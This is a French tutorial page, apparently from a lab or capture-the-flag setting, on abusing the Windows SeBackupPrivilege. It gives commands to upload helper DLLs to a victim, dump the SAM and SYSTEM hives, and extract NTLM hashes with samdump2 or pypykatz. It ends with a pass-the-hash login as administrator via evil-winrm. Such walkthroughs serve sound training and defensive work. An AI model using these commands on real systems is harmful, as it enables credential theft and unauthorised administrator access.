# SeBackupPrivilege (whoami /priv) - Windows Privilege Escalation

**Vérification des privilèges**

Pour commencer, vérifions les privilèges de l'utilisateur actuel. Exécutez la commande suivante pour vérifier si l'utilisateur dispose du privilège `SeBackupPrivilege` :

```bash
whoami /priv
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FXi5xxyazsr7ZLTorJ9rp%2Fimage.png?alt=media&#x26;token=0be29863-b339-4104-8dbb-72ffd50633e4" alt=""><figcaption></figcaption></figure>

**Téléchargement des fichiers DLL nécessaires**

Pour abuser de ces privilèges, nous devons télécharger des fichiers DLL sur la machine de la victime. Vous pouvez l'obtenir [**ici**](https://github.com/giuliano108/SeBackupPrivilege) .

1. **SeBackupPrivilegeCmdLets.dll**&#x20;

{% embed url="<https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll>" %}

2. **SeBackupPrivilegeUtils.dll**

{% embed url="<https://github.com/giuliano108/SeBackupPrivilege/blob/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll>" %}

Téléchargez ces fichiers sur la machine de la victime à l'aide des commandes suivantes&#x20;

```powershell
upload SeBackupPrivilegeCmdLets.dll
upload SeBackupPrivilegeUtils.dll
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F2WgDjwfWAvCfooYmsCKR%2Fimage.png?alt=media&#x26;token=50ffdded-c067-4699-8d92-29778f849983" alt=""><figcaption></figcaption></figure>

**Chargement des modules DLL**

Une fois les fichiers DLL téléchargés, chargez-les dans la session PowerShell en utilisant les commandes suivantes :

```powershell
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
```

**Sauvegarde des fichiers SAM et SYSTEM**

Nous allons maintenant sauvegarder les fichiers `SAM` et `SYSTEM` qui contiennent les informations d'identification de l'utilisateur. Utilisez les commandes suivantes pour les sauvegarder :

```powershell
reg save hklm\sam sam
reg save hklm\system system
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FeMcLZGRXT0dUanEsIMHG%2Fimage.png?alt=media&#x26;token=8e550508-3a0b-420c-8f18-f2d818c1722a" alt=""><figcaption></figcaption></figure>

**Téléchargement des fichiers SAM et SYSTEM**

Après avoir sauvegardé les fichiers, vous pouvez les télécharger sur votre machine virtuelle (VM) pour les analyser :

```powershell
download sam
download system
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FWRboaaynYra4DECJV6kY%2Fimage.png?alt=media&#x26;token=b28dd265-9baf-4359-91ee-d637a3d82858" alt=""><figcaption></figcaption></figure>

### **Extraction des hachages du fichier SAM**

Utilisez `samdump2` pour extraire les hachages des fichiers `SAM` et `SYSTEM` :

```bash
samdump2 system sam
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F5VQIb2OAg7RQtdhydjwb%2Fimage.png?alt=media&#x26;token=13a43212-955c-4edc-8e0e-ede55b04e6ba" alt=""><figcaption></figcaption></figure>

Si cette commande ne fonctionne pas, vous pouvez essayer avec `pypykatz` pour extraire les hachages directement :

```bash
pypykatz registry system --sam sam
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2Fw0OlOFY88AOzAB6Okk4h%2Fimage.png?alt=media&#x26;token=65a2bd8a-7fa2-429b-b429-cb519852b5c3" alt=""><figcaption></figcaption></figure>

Cela devrait vous fournir un hachage valide, comme par exemple :

* hash: `2b87e7c93a3e8a0ea4a581937016f341`

### **Pass-the-Hash avec Evil-WinRM**

Maintenant que vous avez le hachage, vous pouvez l'utiliser pour effectuer un "Pass-the-Hash" et vous connecter à la machine cible en utilisant `evil-winrm` :

```bash
evil-winrm  -i 10.10.11.35 -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FvzWA3xPEPTjkNNGJVPKT%2F%7B97029CC7-1C0D-4857-984D-5B10A40D1DD8%7D.png?alt=media&#x26;token=daad3aa3-82cc-4262-99d7-2bf218ede5dd" alt=""><figcaption></figcaption></figure>